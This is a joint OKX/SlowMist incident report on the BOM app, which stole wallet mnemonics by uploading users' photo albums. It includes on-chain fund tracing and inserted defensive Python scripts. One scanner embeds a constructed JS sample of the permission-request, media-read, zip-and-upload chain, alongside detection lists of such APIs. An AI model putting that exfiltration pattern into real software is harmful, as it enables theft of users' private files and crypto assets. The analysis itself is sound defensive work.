OKX SlowMist jointly released | Bom malware swept tens of thousands of users and stole assets exceeding $1.82 million

Analysis, 2 weeks ago

On February 14, 2025, many users reported that their wallet assets had been stolen. On-chain analysis showed that all of the theft cases matched the characteristics of a mnemonic/private key leak. Follow-up interviews with the victims found that most of them had installed and used an application called BOM. Further investigation showed that the application was in fact carefully disguised fraud software: after inducing users to grant authorization through the app, the criminals illegally obtained mnemonic/private key material and then systematically transferred and concealed the assets. The SlowMist AML team and the OKX Web3 security team therefore investigated and are disclosing the malware's modus operandi together with an on-chain tracking analysis, in the hope of giving users security warnings and suggestions.

1. Malware Analysis (OKX)

With the users' consent, the OKX Web3 security team collected the APK files of the BOM application from some users' phones for analysis. The details are as follows:

1. Conclusion

1. After entering the contract page, the malicious app deceives users into authorizing local file and album permissions on the grounds that it is necessary for the application to run.

2. After obtaining the user's authorization, the app scans and collects media files from the device's photo album in the background, packages them, and uploads them to a server. If the user's files or photo album contain information related to mnemonics or private keys, the criminals can use the information collected by the app to steal the user's wallet assets.

2. Analysis process

1. Preliminary analysis of samples

1) Application signature analysis

The signing certificate's subject is not in the usual form: after parsing it reads adminwkhvjv, a meaningless string of random characters. Normal applications usually use a meaningful combination of letters.

2) Malicious permissions analysis

In the app's AndroidManifest file, a large number of permissions are registered, including information-sensitive ones such as reading and writing local files, and reading media files and photo albums.
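
The two static checks described above (suspicious signer subject, over-broad media and storage permissions) can be scripted. The following is an added example, not code from the OKX or SlowMist teams; the manifest it parses is a constructed sample in the shape apktool emits, and the signer CN is taken from the report. The consonant-run heuristic for a random-looking subject is an assumption of this example, not the teams' method.

```python
"""Static triage of a decoded AndroidManifest.xml and an APK signer's subject CN.
Added example, not OKX/SlowMist tooling."""
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Permissions that let an app reach local files and media the way the report describes.
MEDIA_AND_STORAGE_PERMISSIONS = {
    "android.permission.READ_EXTERNAL_STORAGE",
    "android.permission.WRITE_EXTERNAL_STORAGE",
    "android.permission.MANAGE_EXTERNAL_STORAGE",
    "android.permission.READ_MEDIA_IMAGES",
    "android.permission.READ_MEDIA_VIDEO",
    "android.permission.READ_MEDIA_VISUAL_USER_SELECTED",
}

# Constructed manifest for illustration; it is NOT the BOM app's manifest.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.constructed">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
  <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
  <uses-permission android:name="android.permission.READ_MEDIA_IMAGES"/>
  <uses-permission android:name="android.permission.READ_MEDIA_VIDEO"/>
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
  <application android:label="Wallet"/>
</manifest>"""


def declared_permissions(manifest_xml: str) -> list[str]:
    """Return every android:name on a <uses-permission> element, in manifest order."""
    root = ET.fromstring(manifest_xml)
    return [el.get(ANDROID_NS + "name", "") for el in root.iter("uses-permission")]


def flag_media_permissions(manifest_xml: str) -> list[str]:
    """Subset of declared permissions that grant file/media/album access."""
    return sorted(p for p in declared_permissions(manifest_xml) if p in MEDIA_AND_STORAGE_PERMISSIONS)


def max_consonant_run(text: str) -> int:
    """Longest run of consecutive consonant letters; spaces and digits reset the run."""
    run = best = 0
    for ch in text.lower():
        if ch.isalpha() and ch not in "aeiou":
            run += 1
            best = max(best, run)
        else:
            run = 0
    return best


def looks_random_subject(cn: str, threshold: int = 5) -> bool:
    """Heuristic (assumption of this example): natural words rarely exceed a
    5-consonant run, so 'adminwkhvjv' is flagged while 'Android Debug' is not."""
    letters = [c for c in cn.lower() if c.isalpha()]
    if not letters:
        return True
    no_vowels = not any(c in "aeiou" for c in letters)
    return no_vowels or max_consonant_run(cn) >= threshold


def triage(manifest_xml: str, signer_cn: str) -> dict:
    """Combine both checks into one finding list for an analyst."""
    perms = flag_media_permissions(manifest_xml)
    random_subject = looks_random_subject(signer_cn)
    findings = []
    if perms:
        findings.append("media/storage permissions declared: " + ", ".join(perms))
    if random_subject:
        findings.append(f"signer CN looks auto-generated: {signer_cn!r}")
    return {"media_permissions": perms, "random_subject": random_subject, "findings": findings}


if __name__ == "__main__":
    for line in triage(SAMPLE_MANIFEST, "adminwkhvjv")["findings"]:
        print(line)
```

In practice the CN comes from `apksigner verify --print-certs app.apk`, and the decoded manifest from `apktool d app.apk`; the heuristic is only a prompt to look at the full certificate, since a legitimate publisher can also use a terse CN.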

2. Dynamic Analysis

Because the app's backend interface service was offline at the time of analysis, the app could not run normally, so dynamic analysis could not be performed for the time being.

3. Decompilation analysis

After decompilation, we found that the number of classes in the dex of this application was very small, and we performed static analysis on these classes at the code level.

Its main logic is to decrypt some files and load the application:

The build output files of uniapp are found in the assets directory, indicating that the app was developed with the cross-platform framework uniapp:

For an application built on the uniapp framework, the main logic lives in the build output file app-service.js, while some key code is encrypted in app-confusion.js. We therefore started the analysis from app-service.js.

1) Trigger entry

Among the registered page entries, we found one named contract page:

The corresponding function index is 6596

2) Initialization reporting of device information

The onLoad() callback, fired after the contract page has loaded, calls doContract():

initUploadData() is called in doContract()

In initUploadData(), the network status is checked first, and the image and video lists are checked to see whether they are empty. Finally, the callback e() is called.

The callback e() is getAllAndIOS():

3) Check and request permissions

Here, on iOS, the app first requests permissions, deceiving users into agreeing with a message claiming that the application needs them to run normally. This authorization request is quite suspicious: as a blockchain-related application, its normal operation has no necessary connection with photo album permissions, so the request clearly exceeds what the application needs to run.

On Android, the app likewise checks for and requests photo album permissions first.

4) Collect and read album files

androidDoingUp() then reads the pictures and videos and packages them.

5) Upload album files

Finally, the files are uploaded in uploadBinFa(), uploadZipBinFa() and uploadDigui(). Note that the upload interface path is also a random string of characters.

The iOS flow is similar. After obtaining the permission, the app starts collecting content to upload through getScreeshotAndShouchang().

6) Upload interface

The commonUrl domain in the reporting URL is returned by the /api/bf 9023/c 99 so interface.

The domain of this interface comes from the local cache of uniapp.

The code for writing to the cache was not found. It may be encrypted and obfuscated and exists in app-confusion.js. The domain was seen in the application cache during a historical run.
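
The call chain reconstructed in steps 1) to 6) (page entry, permission request, album read, upload to a dynamically configured domain) can be triaged mechanically in a uniapp bundle by building a function-level call graph and asking which functions can reach all three behaviours. The following is an added example, not the OKX or SlowMist analysis tooling; the bundle it scans is a constructed miniature that reuses the function names from the report, the uni/plus API names it matches are assumptions about what such a bundle might call, and the upload path is a placeholder.

```python
"""Heuristic static triage of a uniapp JS bundle (app-service.js style).
Added example, not OKX/SlowMist tooling. API names are assumptions."""
import re

# Constructed bundle mirroring the report's chain; not the BOM app's code.
SAMPLE_BUNDLE = r"""
function onLoad(){ doContract(); }
function doContract(){ initUploadData(getAllAndIOS); }
function initUploadData(e){ uni.getNetworkType({success:function(r){ if(r.networkType!=='none'){ e(); } }}); }
function getAllAndIOS(){ plus.android.requestPermissions(["android.permission.READ_EXTERNAL_STORAGE"], function(){ androidDoingUp(); }); }
function androidDoingUp(){ var ms = plus.android.importClass("android.provider.MediaStore"); plus.zip.compressFile("_doc/up", "_doc/up.zip", function(){ uploadZipBinFa("_doc/up.zip"); }); }
function uploadZipBinFa(p){ var base = uni.getStorageSync("commonUrl"); uni.uploadFile({url: base + "/api/xk3f9/q2", filePath: p, name: "file"}); }
function showHome(){ uni.request({url: "https://example.invalid/home"}); }
"""

# Substrings that indicate each behaviour (assumed API names / framework class names).
API_CATEGORIES = {
    "permission": ("plus.android.requestPermissions(", "uni.authorize("),
    "media_read": ("android.provider.MediaStore", "plus.gallery.pick(", "uni.chooseImage(", "uni.chooseVideo("),
    "upload": ("uni.uploadFile(", "plus.uploader.createUpload("),
}

FUNC_DECL = re.compile(r"function\s+([A-Za-z_$][\w$]*)\s*\([^)]*\)\s*\{")


def _body(src: str, open_brace: int) -> str:
    """Return the text between a '{' and its matching '}' (braces inside strings are not special-cased)."""
    depth = 0
    for i in range(open_brace, len(src)):
        if src[i] == "{":
            depth += 1
        elif src[i] == "}":
            depth -= 1
            if depth == 0:
                return src[open_brace + 1:i]
    return src[open_brace + 1:]


def function_bodies(src: str) -> dict[str, str]:
    """Map each named function declaration to its body, in order of appearance."""
    bodies = {}
    for m in FUNC_DECL.finditer(src):
        bodies.setdefault(m.group(1), _body(src, m.end() - 1))
    return bodies


def call_graph(bodies: dict[str, str]) -> dict[str, set[str]]:
    """Edges for direct calls AND bare references, so a function passed as a callback
    (initUploadData(getAllAndIOS)) still links the caller to it."""
    names = set(bodies)
    graph = {}
    for name, body in bodies.items():
        refs = set(re.findall(r"\b([A-Za-z_$][\w$]*)\b", body))
        graph[name] = (refs & names) - {name}
    return graph


def categories_of(body: str) -> set[str]:
    return {cat for cat, needles in API_CATEGORIES.items() if any(n in body for n in needles)}


def reachable_categories(bodies, graph, start: str) -> set[str]:
    """Union of behaviour categories over everything reachable from `start`."""
    seen, stack, cats = set(), [start], set()
    while stack:
        f = stack.pop()
        if f in seen:
            continue
        seen.add(f)
        cats |= categories_of(bodies[f])
        stack.extend(graph[f])
    return cats


def find_exfil_entrypoints(src: str) -> list[str]:
    """Functions from which permission request, media read and upload are all reachable."""
    bodies = function_bodies(src)
    graph = call_graph(bodies)
    return [f for f in bodies if reachable_categories(bodies, graph, f) >= set(API_CATEGORIES)]


def upload_urls(src: str) -> dict[str, list[str]]:
    """For every uploading function, the raw `url:` expressions, so an analyst can see
    whether the host is a literal or assembled from storage at run time."""
    bodies = function_bodies(src)
    return {f: re.findall(r"url\s*:\s*([^,}]+)", b) for f, b in bodies.items() if "upload" in categories_of(b)}


if __name__ == "__main__":
    print("entry points reaching permission+media+upload:", find_exfil_entrypoints(SAMPLE_BUNDLE))
    print("upload URL expressions:", upload_urls(SAMPLE_BUNDLE))
```

Two details of the output are worth noting. initUploadData itself is not reported, because its body only calls the opaque callback e(); doContract is, because it references getAllAndIOS by name when passing it in. That is exactly the indirection the manual analysis above had to resolve. The url expression `base + "/api/…"` shows the host coming from uni.getStorageSync rather than a literal, matching the report's observation that the domain lives in the uniapp local cache.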

2. On-chain Funding Analysis (SlowMist)

According to the analysis of MistTrack, an on-chain tracking and anti-money laundering tool under SlowMist AML, the current main coin theft address (0x49aDd3E8329f2A2f507238b0A684d03EAE205aab) has stolen funds from at least 13,000 users and made a profit of more than 1.82 million US dollars.

(https://dune.com/queries/4721460)

The first transaction of the address 0x49aDd3E8329f2A2f507238b0A684d03EAE205aab occurred on February 12, 2025, and 0.001 BNB was transferred from the address 0x9AEf1CA082c17f9D52Aa98ca861b50c776dECC35 as the initial capital:

Analyzing the address 0x9AEf1CA082c17f9D52Aa98ca861b50c776dECC35, the first transaction of this address also appeared on February 12, 2025. Its initial funds came from the address 0x71552085c854EeF431EE55Da5B024F9d845EC976 marked as Theft-Stolen Private Key by MistTrack:

Continuing with the funds flow of the initial hacker address 0x49aDd3E8329f2A2f507238b0A684d03EAE205aab:

BSC: Profit of about $37,000, including USDC, USDT, WBTC and other currencies, often using PancakeSwap to exchange some tokens for BNB:

The current address balance is 611 BNB and tokens worth approximately $120,000, such as USDT, DOGE, and FIL.

Ethereum: Profit of about $280,000, most of which came from ETH transferred from other chains. Then 100 ETH was transferred to 0x7438666a4f60c4eedc471fa679a43d8660b856e0. This address also received 160 ETH transferred from the above address 0x71552085c854EeF431EE55Da5B024F9d845EC976. A total of 260 ETH has not been transferred out yet.

Polygon: Profit of about 37,000 or 65,000 US dollars, including WBTC, SAND, STG and other currencies. Most of the tokens have been exchanged for 66,986 POL through OKX-DEX. The current balance of the hacker address is as follows:

Arbitrum: Profit of about $37,000, including USDC, USDT, WBTC and other currencies, tokens converted to ETH, a total of 14 ETH cross-chain to Ethereum through OKX-DEX:

Base: Profit of about $12,000, including FLOCK, USDT, MOLLY and other currencies, tokens converted to ETH, a total of 4.5 ETH cross-chain to Ethereum through OKX-DEX:

The remaining chains are not described in detail here. We also briefly analyzed another hacker address provided by a victim.

The first transaction of the hacker address 0xcb6573E878d1510212e84a85D4f93Fd5494f6EA0 appeared on February 13, 2025, with a profit of about 650,000 US dollars, involving multiple chains, and the relevant USDT was cross-chain to the TRON address TFW52pZ3GPPUNW847rdefZjqtTRxTCsdDx:

The address TFW52pZ3GPPUNW847rdefZjqtTRxTCsdDx received a total of 703,119.2422 USDT, with a balance of 288,169.2422 USDT, of which 83,000 USDT was transferred to the address TZJiMbiqBBxDXhZXbrtyTYZjVDA2jd4eus and was not transferred out, and the remaining 331,950 USDT was transferred to the address THKqT6PybrzcxkpFBGSPyE11kemRNRmDDz that had interacted with Huionepay.

We will continue to monitor the relevant balance addresses.
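
The tracing above (follow outgoing transfers from a theft address, note what each downstream address still holds, and notice where funds from a second source are co-mingled) can be reproduced on a small ledger. The following is an added example, not MistTrack or any SlowMist tooling; its transfer rows are constructed from the figures the report gives, with the TRON inflow to TFW52… aggregated into a single row, and the "other sources" field exists to surface the 160 ETH from 0x7155… that sits in the same address as the 100 ETH traced from 0x49aD….

```python
"""Fund-flow tracing over a constructed transfer ledger.
Added example, not SlowMist/MistTrack code. Rows use the figures from the report."""
from collections import defaultdict, deque
from decimal import Decimal

# (from, to, asset, amount). Constructed: the first row aggregates the cross-chain USDT inflow.
TRANSFERS = [
    ("0xcb6573E878d1510212e84a85D4f93Fd5494f6EA0", "TFW52pZ3GPPUNW847rdefZjqtTRxTCsdDx", "USDT", "703119.2422"),
    ("TFW52pZ3GPPUNW847rdefZjqtTRxTCsdDx", "TZJiMbiqBBxDXhZXbrtyTYZjVDA2jd4eus", "USDT", "83000"),
    ("TFW52pZ3GPPUNW847rdefZjqtTRxTCsdDx", "THKqT6PybrzcxkpFBGSPyE11kemRNRmDDz", "USDT", "331950"),
    ("0x49aDd3E8329f2A2f507238b0A684d03EAE205aab", "0x7438666a4f60c4eedc471fa679a43d8660b856e0", "ETH", "100"),
    ("0x71552085c854EeF431EE55Da5B024F9d845EC976", "0x7438666a4f60c4eedc471fa679a43d8660b856e0", "ETH", "160"),
]

# Labels as stated in the report (not a live MistTrack lookup).
LABELS = {
    "0x71552085c854EeF431EE55Da5B024F9d845EC976": "Theft-Stolen Private Key (MistTrack label per report)",
    "THKqT6PybrzcxkpFBGSPyE11kemRNRmDDz": "interacted with Huionepay (per report)",
}


def build_ledger(transfers):
    """Index transfers by sender and by receiver; amounts become Decimal to avoid float drift."""
    outgoing, incoming = defaultdict(list), defaultdict(list)
    for src, dst, asset, amount in transfers:
        row = (src, dst, asset, Decimal(amount))
        outgoing[src].append(row)
        incoming[dst].append(row)
    return outgoing, incoming


def reachable(outgoing, seed, asset, max_hops):
    """Breadth-first walk along outgoing transfers of one asset; returns address -> hop count."""
    hops = {seed: 0}
    queue = deque([seed])
    while queue:
        addr = queue.popleft()
        if hops[addr] >= max_hops:
            continue
        for _, dst, a, _ in outgoing[addr]:
            if a == asset and dst not in hops:
                hops[dst] = hops[addr] + 1
                queue.append(dst)
    return hops


def trace(transfers, seed, asset, max_hops=6):
    """Per reached address: hop distance, totals, remaining balance, label, and any
    inflow sources that are NOT downstream of the seed (co-mingled funds)."""
    outgoing, incoming = build_ledger(transfers)
    hops = reachable(outgoing, seed, asset, max_hops)
    report = {}
    for addr, h in hops.items():
        received = sum((r[3] for r in incoming[addr] if r[2] == asset), Decimal(0))
        sent = sum((r[3] for r in outgoing[addr] if r[2] == asset), Decimal(0))
        report[addr] = {
            "hops": h,
            "received": received,
            "sent": sent,
            "balance": received - sent,
            "other_sources": sorted({r[0] for r in incoming[addr] if r[2] == asset and r[0] not in hops}),
            "label": LABELS.get(addr, ""),
        }
    return report


def holding_addresses(report):
    """Addresses in the trace that still hold a positive balance of the traced asset."""
    return sorted(a for a, info in report.items() if info["balance"] > 0)


if __name__ == "__main__":
    usdt = trace(TRANSFERS, "0xcb6573E878d1510212e84a85D4f93Fd5494f6EA0", "USDT")
    for addr, info in usdt.items():
        print(f"{info['hops']} hops  {addr}  balance={info['balance']}  {info['label']}")
    print("still holding USDT:", holding_addresses(usdt))
    eth = trace(TRANSFERS, "0x49aDd3E8329f2A2f507238b0A684d03EAE205aab", "ETH")
    print("0x7438... ETH balance:", eth["0x7438666a4f60c4eedc471fa679a43d8660b856e0"]["balance"],
          "co-mingled from:", eth["0x7438666a4f60c4eedc471fa679a43d8660b856e0"]["other_sources"])
```

The balance reported for a reached address is its full balance, not only the portion traceable to the seed; the `other_sources` list is what tells an analyst that the 260 ETH in 0x7438… is only 100 ETH from the traced address plus 160 ETH from the separately labelled 0x7155…. On a real investigation the ledger would come from a chain indexer rather than a hand-built list, and bridging hops would need their own rows.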

3. Security Recommendations

To help users improve their protection awareness, the SlowMist AML team and the OKX Web3 security team have compiled the following security recommendations:

1. Never download software from unknown sources (including so-called "wool-pulling" reward-farming tools and any software from unknown publishers).

2. Never trust software download links recommended by friends or communities, always download from official channels.

3. Download and install apps from regular channels, including Google Play, App Store, and major official app stores.

4. Keep the mnemonics properly and do not save them by taking screenshots, taking photos, saving them in a notepad, or using a cloud disk. The OKX wallet mobile app has prohibited screenshots of the private key and mnemonics pages.

5. Use physical methods to save mnemonics, such as writing them on paper, storing them in a hardware wallet, or segmented storage (splitting the mnemonic/private key and keeping the parts in different locations).

6. Rotate your wallet regularly; where practical, moving to a new wallet periodically helps eliminate potential security risks.

7. Use professional on-chain tracking tools, such as MistTrack (https://misttrack.io/), to monitor and analyze funds, reduce the risk of fraud or phishing, and better protect asset security.

8. It is highly recommended to read the Blockchain Dark Forest Self-Rescue Manual written by Yu Xian, the founder of SlowMist.

Disclaimer

This content is for reference only and does not constitute, and should not be considered, (i) investment advice or a recommendation, (ii) an offer or solicitation to buy, sell or hold digital assets, or (iii) financial, accounting, legal or tax advice. We do not guarantee the accuracy, completeness or usefulness of this information. Digital assets (including stablecoins and NFTs) are subject to market fluctuations, involve high risk, and may depreciate in value or even become worthless. You should carefully consider whether trading or holding digital assets is suitable for you in light of your financial situation and risk tolerance. Consult your legal/tax/investment professional about your specific situation. Not all products are available in all regions. For more details, please refer to the OKX Terms of Service and Risk Disclosure Disclaimer. OKX Web3 Mobile Wallet and its derivative services are subject to separate terms of service. You are responsible for understanding and complying with applicable local laws and regulations.
